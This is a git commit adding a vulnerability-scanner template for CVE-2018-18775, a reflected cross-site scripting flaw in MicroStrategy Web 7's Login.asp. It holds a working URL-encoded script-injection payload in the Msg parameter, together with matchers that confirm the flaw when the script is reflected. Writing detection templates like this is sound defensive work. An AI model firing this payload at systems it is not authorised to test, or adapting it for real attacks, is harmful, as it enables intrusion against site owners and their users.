Create CVE-2018-18775.yaml

patch-1
Roberto Nunes 2021-06-20 19:16:44 +09:00 committed by GitHub
parent 1d98d72476
commit e71c2d6513
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 30 additions and 0 deletions

30
CVE-2018-18775.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2018-18775
info:
author: 0x_Akoko
description: Microstrategy Web, version 7, does not sufficiently encode user-controlled inputs, resulting in a Cross-Site Scripting (XSS) vulnerability via the Login.asp Msg parameter
name: Cross Site Scripting in Microstrategy Web version 7
severity: medium
tags: microstrategy,xss
reference: https://www.exploit-db.com/exploits/45755
requests:
- method: GET
path:
- '{{BaseURL}}/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3B%3C%2Fscript%3E%3C'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<script>alert(/{{randstr}}/);</script>"
part: body
- type: word
words:
- "text/html"
part: header